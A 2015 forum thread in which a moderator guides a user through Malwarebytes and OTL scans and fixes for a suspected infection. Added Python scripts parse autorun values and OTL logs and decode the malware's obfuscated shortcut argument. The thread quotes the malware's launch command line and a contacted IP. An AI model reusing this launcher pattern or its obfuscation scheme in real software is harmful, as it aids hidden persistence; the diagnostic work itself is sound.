Topic: windows/SysWOW64/rundll32.exe halp me ?

Posted by tomfullerton (Newbie), January 22, 2015, 05:22:35 PM
Hello, I need to do a series of thorough scans, since for a few days in a row I kept getting 5 processes (rundll32.exe) that would pop up an "Open file with" window right after I booted. I never clicked Open, and eventually found out that the rundll32.exe was in C:\Windows\SysWOW64. I also did all scans with Malwarebytes, RogueKiller64 and Microsoft Essentials and haven't found much. But I also found a registry key under Computer\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce with a filename "Adobe Speed Launcher", which I don't quite like, and its value is set to 1421941580. Anyway, any help with a series of scans would be appreciated.
Attached: RogueKiller report

RogueKiller V10.2.0.0 (x64) [Jan 19 2015] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : Tom Jones [Administrator]
Mode : Scan -- Date : 01/22/2015  11:25:29

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 4 ¤¤¤
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-265094073-1043058997-3425087786-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031A47-3F72-44A7-89C5-5595FE6B30EE} : 1  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 2 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1       localhost
[C:\Windows\System32\drivers\etc\hosts] ::1             localhost

¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD1502FAEX-007BA0 ATA Device +++++
--- User ---
[MBR] 97ed83405a22741aa5222a22e681b176
[BSP] e5e13b1e52b32315f7fa08500dcdf184 : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 1430797 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: INTEL SS DSC2CW120A3 SCSI Disk Device +++++
--- User ---
[MBR] b7e0dc6f6c3f2ac7a7eca2b4ee48a17c
[BSP] 1f82269f5ba8a4c12ac33d16d54131fc : Windows Vista/7/8 MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )


============================================
RKreport_DEL_01212015_224147.log - RKreport_DEL_01212015_224200.log - RKreport_DEL_01212015_225447.log - RKreport_DEL_01212015_225932.log
RKreport_DEL_01222015_001748.log - RKreport_SCN_01212015_223814.log - RKreport_SCN_01212015_224326.log - RKreport_SCN_01212015_225859.log
RKreport_SCN_01212015_233829.log - RKreport_SCN_01222015_001707.log



Thank you!
« Last Edit: January 22, 2015, 05:28:03 PM by tomfullerton »
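Two details in the post above can be checked without any scanner. The SysWOW64 copy of rundll32.exe is the 32-bit rundll32 that 64-bit Windows ships, so its location alone is not a finding; what matters is the command line it was started with (the DLL and entry point it was told to run). The RunOnce value is also worth a second look: Run/RunOnce values are command lines, and a bare number is not one. The script below is an added example (not from the thread and not part of RogueKiller); it classifies autorun values, decoding plausible Unix timestamps and flagging executables under user-writable paths. The sample entries are constructed from values quoted in this thread, and the live-registry reader only works on Windows.

```python
"""Classify Run/RunOnce values the way a reviewer reads them by hand.
Added example, not from the thread or from any tool it names."""
import re
from datetime import datetime, timezone

# A value that is only digits runs nothing; if it falls in this range
# (years 2000..2030) it is most likely a Unix epoch timestamp.
EPOCH_MIN, EPOCH_MAX = 946_684_800, 1_893_456_000

# Locations any user-level process can write to. A vendor launcher normally
# lives under Program Files, not here.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\|\\Temp\\|\\AppData\\", re.IGNORECASE)


def first_path_token(cmdline: str) -> str:
    """Return the executable part of an autorun command line (quoted or not)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def classify_autorun(name: str, value: str) -> dict:
    """Return a finding dict with a 'kind' of epoch, number, user_writable or command."""
    finding = {"name": name, "value": value}
    if value.strip().isdigit():
        n = int(value)
        if EPOCH_MIN <= n <= EPOCH_MAX:
            finding["kind"] = "epoch"
            finding["utc"] = datetime.fromtimestamp(n, tz=timezone.utc).isoformat()
        else:
            finding["kind"] = "number"
        return finding
    exe = first_path_token(value)
    finding["exe"] = exe
    finding["kind"] = "user_writable" if USER_WRITABLE.search(exe) else "command"
    return finding


def read_live_runonce() -> list:
    """Windows only: read HKCU RunOnce with the standard library (not exercised here)."""
    import winreg  # stdlib on Windows, ImportError elsewhere
    path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce"
    out = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        i = 0
        while True:
            try:
                name, data, _type = winreg.EnumValue(key, i)
            except OSError:  # raised once the value index runs past the end
                break
            out.append(classify_autorun(name, str(data)))
            i += 1
    return out


# Constructed sample: the RunOnce value quoted in the post, plus the Temp path
# that appears later in the thread as a contrasting, path-style entry.
SAMPLE = [
    ("Adobe Speed Launcher", "1421941580"),
    ("VLC Media Player",
     r'"C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" 7-5-1-8-9-0-7-5-3-1-1'),
]

if __name__ == "__main__":
    for entry_name, entry_value in SAMPLE:
        print(classify_autorun(entry_name, entry_value))
```

On the values in the post, 1421941580 decodes to 2015-01-22 15:46:20 UTC, the day the thread was opened; whether that entry is harmful is not something the value itself settles, but a timestamp stored where a command line belongs is worth noting when comparing against what the scanners report.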

Reply #1 by Curson (Global Moderator), January 22, 2015, 05:57:05 PM
Hi tomfullerton,

RogueKiller's report is clean.
rundll32.exe is a legit process. Does the pop-up look like the one below?

If that were the case, it could be a file association issue.

Regards.

Reply #2 by tomfullerton, January 22, 2015, 11:52:08 PM
Hello again and thank you for the reply.

First off, yes, it does look like the picture you provided, but I'm very confident that this is some sort of malware.
The reason is that this has never happened before, and there are 5 instances of said window when I just boot up. The other clue that this is not some legit program is that under the "Program/File" name I see my first name, and that just can't be right.

Please advise me to run some extensive scans with other tools if you can and guide me through it.
I'd appreciate it a lot.

Thank you again!

Reply #3 by Curson (Global Moderator), January 23, 2015, 12:22:21 AM
Hi tomfullerton,

OK, we will investigate this more thoroughly.

1. Malwarebytes Anti-Malware

Please download Malwarebytes Anti-Malware and save it to your desktop.
  • Double-click on the setup file (mbam-setup.exe), then click on Run to install.
    Malwarebytes will automatically open to its Dashboard. If you have never run this version, you should see a red note at the top indicating "A scan has never been run on your system".
  • Click on Update Now to download the current database definitions, then click the Scan Now button.
    If you have run this version before, you should see a green note at the top indicating "Your system is fully protected".
The THREAT SCAN will automatically begin.
When the scan has completed, the results will be displayed. Click on Quarantine All, then click on Apply Actions.

To complete any actions taken you will be prompted to restart your computer...click on Yes.
Failure to reboot normally will prevent Malwarebytes from removing all the malware.

After rebooting the computer, copy and paste the mbam.log in your next reply.

To retrieve the scan log information (Method 1) :
  • Open Malwarebytes Anti-Malware.
  • Click the History Tab at the top and select Application Logs.
  • Select the box next to Scan Log. Choose the most current scan.
  • Click the Export button and save the log as a .txt file on your Desktop or another location.
  • Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
To retrieve the scan log information (Method 2) :
  • Open Malwarebytes Anti-Malware.
  • Click the Scan Tab at the top.
  • Click the View detailed log link on the right.
  • Click the Export button and save the log as a .txt file on your Desktop or another location.
  • Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
Alternatively, logs are named by the date of scan in the following format: mbam-log-yyyy-mm-dd and automatically saved to the following locations:
  • -- XP: C:\Documents and Settings\<Username>\Application Data\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd
  • -- Vista, Windows 7/8: C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\Logs\mbam-log-yyyy-mm-dd
2. OTL

Please download OTL by OldTimer and save the file to your desktop.
  • Double-click on the setup file (OTL.exe) and select Run as Administrator to start the tool.
  • Make sure that Scan All Users, LOP check and Purity check are ticked.
  • For 64-bit systems only - make sure that Include 64-bit option is also ticked.
  • Sections Processes, Modules, Services, Drivers, Standard Registry are set to Use Safelist.
  • Section Extra Registry is also set to Use Safelist.
Push Run Scan and wait patiently.
Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of both logfiles in your next reply.

Regards.

Reply #4 by tomfullerton, January 23, 2015, 01:42:57 AM
Hello again,

I have attached all 3 log files after scans, and also I've found a "FILE" under C:\Users named "Tom" and I've attached it.
It looks super suspicious I think. I scanned it with VirusTotal but it doesn't seem to find anything wrong with it, nonetheless the results are here: https://www.virustotal.com/en/file/60c32e7ba31fd30810d23222932a76129a7aa13347ece280c3a89f785c72d997/analysis/1421971881/
I proceeded to open it, and it seems to be a text file with some code in it that I think is dead on some sort of malware trying to connect to some IP address that's not even mine: 69.162.120.131

NOTE: I changed the 'file' extension to .txt because the forum wouldn't let me upload a no-extension file.

Please advise.

Thank you!

Reply #5 by tomfullerton, January 23, 2015, 02:10:22 AM
Okay now this is probably bad.

Another shortcut to a .exe file appeared on my desktop under the fake name "VLC Media Player" which I obviously have never installed since I hate that player.
The shortcut's target is "C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt

I also scanned this with VirusTotal and these are the results: https://www.virustotal.com/en/file/f34683038e2d3a0cc4a74d91c199f00d3896b80aac04edbcef6191f3bd778b65/analysis/1421975128/

Someone has got to help me get rid of this stuff; apparently none of the tools I've used so far have detected anything...
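The shortcut target quoted in the post has three parts after the executable: the unquoted path again, a dash-separated digit sequence, and a base64 blob. The script below is an added example (not from the thread, not from VirusTotal or any tool named here) that tests one hypothesis about those two arguments: the digits are a repeating per-byte key, and the blob is base64 of the real argument string with the key subtracted from each byte. The only evidence for the hypothesis is the result: adding the key back turns the blob, which otherwise contains control bytes, into a readable "/NAME=value" command line. What the individual switches mean is not established by the thread, and the SERVER_URL value stops where the blob as pasted in the post stops.

```python
"""Decode the obfuscated argument of the shortcut target quoted in the post.
Added example, not part of the thread. The key/offset scheme is a hypothesis
confirmed only by the decoded text being readable."""
import base64

# Shortcut target exactly as quoted in the post (the blob may be cut where the paste ends).
TARGET = (
    r'"C:\Users\Tom Jones\AppData\Local\Temp\bcdcabfdbbfi.exe" '
    r"C:\Users\TOMJO~1\AppData\Local\Temp\bcdcabfdbbfi.exe 7-5-1-8-9-0-7-5-3-1-1 "
    "KEtIPDQxMjAyHy5MUEFIQEQ2Kx0uTT5PVkdJS0I/OjAfKD9IS0tJPTguNjcrGy47QEQ2Kx0uT0tKQ006"
    "VFhEQTwwMCswGCZTPk1TRFFYUFFENGhtb205LihuZGpt"
)


def split_target(target: str) -> tuple:
    """Return (key digits as ints, base64 blob); both are the last two whitespace-separated tokens."""
    _head, key_text, blob = target.rsplit(None, 2)
    return [int(d) for d in key_text.split("-")], blob


def decode_argument(blob: str, key: list) -> str:
    """Base64-decode, then add key[i mod len(key)] to byte i (the inverse of a per-byte subtraction)."""
    raw = base64.b64decode(blob + "=" * (-len(blob) % 4))  # tolerate missing padding
    plain = bytes((b + key[i % len(key)]) & 0xFF for i, b in enumerate(raw))
    return plain.decode("latin-1")  # never raises; keeps any non-ASCII byte visible


def decode_target(target: str) -> str:
    key, blob = split_target(target)
    return decode_argument(blob, key)


def parse_switches(text: str) -> dict:
    """Turn '/NAME=value /NAME2=value2 ...' into a dict for reporting."""
    out = {}
    for tok in text.split():
        if tok.startswith("/") and "=" in tok:
            name, value = tok[1:].split("=", 1)
            out[name] = value
    return out


if __name__ == "__main__":
    decoded = decode_target(TARGET)
    print(decoded)
    for name, value in parse_switches(decoded).items():
        print(f"  {name} = {value}")
```

The check that led to the key hypothesis is worth knowing for similar strings: after plain base64 decoding, the bytes 0x1F, 0x1D, 0x1B and 0x18 sit exactly where a space (0x20) would separate switches, and each is 0x20 minus the digit that the sequence places at that position, so the digit sequence is the offset table and not, say, a version string.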

Reply #6 by Curson (Global Moderator), January 23, 2015, 02:11:04 PM
Hi tomfullerton,

1. Run OTL Script

Right-click on OTL.exe and select Run as Administrator.
Copy and Paste the following code into the textbox.
:OTL
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
IE - HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = CA 23 D8 6A EC ED CD 01  [binary data]
CHR - plugin: Conduit Chrome Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll
CHR - plugin: Conduit Radio Plugin (Enabled) = C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll

:files
C:\Users\Tom Jones\AppData\Roaming\Windaws.bat
C:\Users\Tom Jones\AppData\Roaming\*.vbs
C:\Users\*.vbs

:commands
[emptytemp]

Then click the Run Fix button at the top.
OTL may ask to reboot the machine. Please do so if asked.
The report should appear in Notepad after the reboot. Copy and paste that report in your next reply.

2. New OTL Scan

Right-click on OTL.exe and select Run as Administrator.
Copy and Paste the following code into the textbox :
C:\Users\*.vbs /S
C:\Users\*.bat /S
Push Run Scan and wait patiently.
Two notepad windows will be opened after this run: OTL.txt (maximized) and Extras.txt (minimized).

Please include the content of OTL.txt in your next reply.

3. New MalwareBytes Scan

Please do a full scan with Malwarebytes Anti-Malware.
When the scan has completed, the results will be displayed. Click on Quarantine All, then click on Apply Actions.

To complete any actions taken you will be prompted to restart your computer...click on Yes.
Failure to reboot normally will prevent Malwarebytes from removing all the malware.

After rebooting the computer, copy and paste the mbam.log in your next reply.

Regards.

Reply #7 by tomfullerton, January 23, 2015, 09:19:44 PM
Sorry, I have to break my post into 2-3 parts because of length.

Anyways here they are:

1. The OTL fix produced this report:

All processes killed
========== OTL ==========
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache AcceptLangs| /E : value set successfully!
HKU\S-1-5-21-265094073-1043058997-3425087786-1000\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache_TIMESTAMP| /E : value set successfully!
File C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/ConduitChromeApiPlugin.dll not found.
File C:\Users\Tom Jones\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljfhnpbhhmmhdamdbpmajlonoecdobln\10.13.20.29_0\plugins/np-cwmp.dll not found.
========== FILES ==========
File\Folder C:\Users\Tom Jones\AppData\Roaming\Windaws.bat not found.
File\Folder C:\Users\Tom Jones\AppData\Roaming\*.vbs not found.
File\Folder C:\Users\*.vbs not found.
========== COMMANDS ==========
 
[EMPTYTEMP]
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
 
User: Public
 
User: Tom Jones
->Temp folder emptied: 1421 bytes
->Temporary Internet Files folder emptied: 451 bytes
->Java cache emptied: 0 bytes
->Google Chrome cache emptied: 52902668 bytes
->Apple Safari cache emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: Tom%20Jones
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 3066 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 0 bytes
%systemroot%\sysnative\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment folder emptied: 0 bytes
RecycleBin emptied: 0 bytes
 
Total Files Cleaned = 50.00 mb
 
 
OTL by OldTimer - Version 3.2.69.0 log created on 01232015_124516

Files\Folders moved on Reboot...
C:\Users\Tom Jones\AppData\Local\Temp\FXSAPIDebugLogFile.txt moved successfully.

PendingFileRenameOperations files...

Registry entries deleted on Reboot...

--------------------------------------------------------------------------------------------------------



2. New OTL scan produced:

OTL logfile created on: 1/23/2015 1:10:34 PM - Run 2
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Tom Jones\Downloads
64bit- Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17501)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
15.97 Gb Total Physical Memory | 12.64 Gb Available Physical Memory | 79.17% Memory free
31.93 Gb Paging File | 27.89 Gb Available in Paging File | 87.33% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 111.69 Gb Total Space | 25.72 Gb Free Space | 23.03% Space Free | Partition Type: NTFS
Drive E: | 1397.26 Gb Total Space | 1099.73 Gb Free Space | 78.71% Space Free | Partition Type: NTFS
 
Computer Name: SSPC | User Name: Tom Jones | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days
 
========== Processes (SafeList) ==========
 
PRC - [2015/01/23 12:34:23 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Tom Jones\Downloads\OTL.exe
PRC - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
PRC - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
PRC - [2013/10/23 17:39:14 | 001,017,224 | ---- | M] (Flux Software LLC) -- C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe
PRC - [2013/07/19 16:28:58 | 000,557,968 | ---- | M] (Cisco Systems, Inc.) -- C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe
PRC - [2012/11/18 12:10:22 | 001,634,304 | ---- | M] (Don HO don.h@free.fr) -- E:\Program Files (x86)\Notepad++\notepad++.exe
PRC - [2010/12/02 09:15:14 | 000,915,584 | ---- | M] () -- C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe
PRC - [2010/11/03 16:30:14 | 000,918,144 | ---- | M] () -- C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
PRC - [2010/10/21 16:52:26 | 000,586,880 | ---- | M] () -- C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
PRC - [2010/10/05 08:32:58 | 001,811,800 | ---- | M] (Logitech(c)) -- C:\Program Files (x86)\Logitech\G35\G35.exe
PRC - [2009/08/17 10:27:36 | 000,995,328 | ---- | M] (NETGEAR) -- C:\Program Files (x86)\NETGEAR\WPN111\WPN111.exe
 
 
========== Modules (No Company Name) ==========
 
MOD - [2015/01/08 19:35:54 | 009,009,480 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll
MOD - [2015/01/08 19:35:51 | 001,077,064 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\libglesv2.dll
MOD - [2015/01/08 19:35:49 | 000,211,272 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\libegl.dll
MOD - [2015/01/08 19:35:48 | 001,677,128 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\ffmpegsumo.dll
MOD - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe
MOD - [2014/04/15 08:31:52 | 000,638,976 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTHAL.dll
MOD - [2014/04/15 08:31:28 | 000,216,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTCore.dll
MOD - [2014/04/15 08:31:20 | 000,127,488 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTUI.dll
MOD - [2014/04/15 08:31:16 | 000,071,680 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTMUI.dll
MOD - [2014/04/15 08:31:10 | 000,056,832 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\RTFC.dll
MOD - [2013/11/30 10:14:10 | 000,204,800 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\ComparePlugin.dll
MOD - [2011/09/21 15:46:28 | 001,673,728 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\NppFTP.dll
MOD - [2011/07/18 16:07:28 | 000,014,336 | ---- | M] () -- E:\Program Files (x86)\Notepad++\plugins\NppExport.dll
 
 
========== Services (SafeList) ==========
 
SRV:64bit: - [2014/11/21 21:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)
SRV:64bit: - [2014/08/22 14:14:34 | 000,368,624 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Program Files\Microsoft Security Client\NisSrv.exe -- (NisSrv)
SRV:64bit: - [2014/08/22 14:14:34 | 000,023,784 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Microsoft Security Client\MsMpEng.exe -- (MsMpSvc)
SRV:64bit: - [2013/10/04 23:58:24 | 000,087,728 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe -- (VsEtwService120)
SRV:64bit: - [2013/05/27 00:50:47 | 001,011,712 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend)
SRV:64bit: - [2011/06/29 09:51:26 | 000,171,688 | ---- | M] (Intel Corporation) [Auto | Running] -- C:\Windows\SysNative\IPROSetMonitor.exe -- (Intel(R)
SRV:64bit: - [2010/02/02 18:03:05 | 000,015,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe -- (c2wts)
SRV:64bit: - [2009/07/13 20:40:01 | 000,193,536 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\appmgmts.dll -- (AppMgmt)
SRV - [2014/12/19 18:38:02 | 000,833,728 | ---- | M] (Valve Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Common Files\Steam\SteamService.exe -- (Steam Client Service)
SRV - [2014/12/11 10:30:48 | 000,315,496 | R--- | M] (Skype Technologies) [Auto | Stopped] -- E:\Program Files\Skype\Updater\Updater.exe -- (SkypeUpdate)
SRV - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) [Auto | Running] -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe -- (AdobeARMservice)
SRV - [2014/04/11 23:08:08 | 000,103,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -- (clr_optimization_v4.0.30319_32)
SRV - [2014/03/20 17:49:18 | 000,067,224 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32)
SRV - [2013/08/22 04:21:36 | 000,119,808 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe -- (Te.Service)
SRV - [2013/08/22 03:55:00 | 000,142,336 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe -- (fussvc)
SRV - [2013/07/19 16:28:58 | 000,557,968 | ---- | M] (Cisco Systems, Inc.) [Auto | Running] -- C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpnagent.exe -- (vpnagent)
SRV - [2010/12/02 09:15:14 | 000,915,584 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AAHM\1.00.14\aaHMSvc.exe -- (asHmComSvc)
SRV - [2010/11/03 16:30:14 | 000,918,144 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe -- (asComSvc)
SRV - [2010/10/21 16:52:26 | 000,586,880 | ---- | M] () [Auto | Running] -- C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe -- (AsSysCtrlService)
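The OTL log above is read by hand in the thread, but its line format is regular enough to triage mechanically. The following is an added example (not OTL's code and not from the thread) that parses PRC, MOD, SRV and DRV entries and applies the three rules a reviewer applies when scanning such a log: an empty company name, a path under a user-writable location, and a modification time inside the file-age window the log header reports (File Age = 30 Days, scan created 1/23/2015 1:10:34 PM). The sample lines are copied verbatim from the OTL log posted in this thread, including two that stress the parser (a service name with an unbalanced parenthesis and a company name with nested parentheses).

```python
"""Parse OTL log entries and flag the ones a reviewer would look at first.
Added example, not OTL's own code. Sample lines copied from the log in the thread."""
import re
from datetime import datetime, timedelta

# One OTL entry looks like:
#   PRC - [2015/01/23 12:34:23 | 000,602,112 | ---- | M] (Company) -- C:\path\file.exe
#   SRV:64bit: - [date | size | attrs | M] (Company) [Auto | Running] -- C:\path\svc.exe -- (ServiceName)
LINE = re.compile(
    r"^(?P<kind>PRC|MOD|SRV|DRV)(?P<bits>:64bit:)? - "
    r"\[(?P<date>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) \| (?P<size>[\d,]+) \| (?P<attrs>\S+) \| (?P<flag>\S)\] "
    r"\((?P<company>.*?)\)(?: \[(?P<state>[^\]]*)\])? -- (?P<path>.*?)(?: -- \((?P<name>.*)\))?$"
)

# Locations a user-level process can write to; system binaries do not live here.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\|\\Temp\\", re.IGNORECASE)

# Values taken from the log header posted in the thread.
SCAN_TIME = datetime(2015, 1, 23, 13, 10, 34)
FILE_AGE_DAYS = 30

SAMPLE_LINES = [
    r"PRC - [2015/01/23 12:34:23 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Tom Jones\Downloads\OTL.exe",
    r"PRC - [2014/12/03 01:31:16 | 000,081,088 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe",
    r"PRC - [2014/05/19 05:46:34 | 000,465,064 | ---- | M] () -- E:\Program Files (x86)\MSI Afterburner\MSIAfterburner.exe",
    r"PRC - [2013/10/23 17:39:14 | 001,017,224 | ---- | M] (Flux Software LLC) -- C:\Users\Tom Jones\AppData\Local\FluxSoftware\Flux\flux.exe",
    r"MOD - [2015/01/08 19:35:54 | 009,009,480 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\Google\Chrome\Application\39.0.2171.99\pdf.dll",
    r"SRV:64bit: - [2014/11/21 21:35:29 | 000,114,688 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IEEtwCollector.exe -- (IEEtwCollectorService)",
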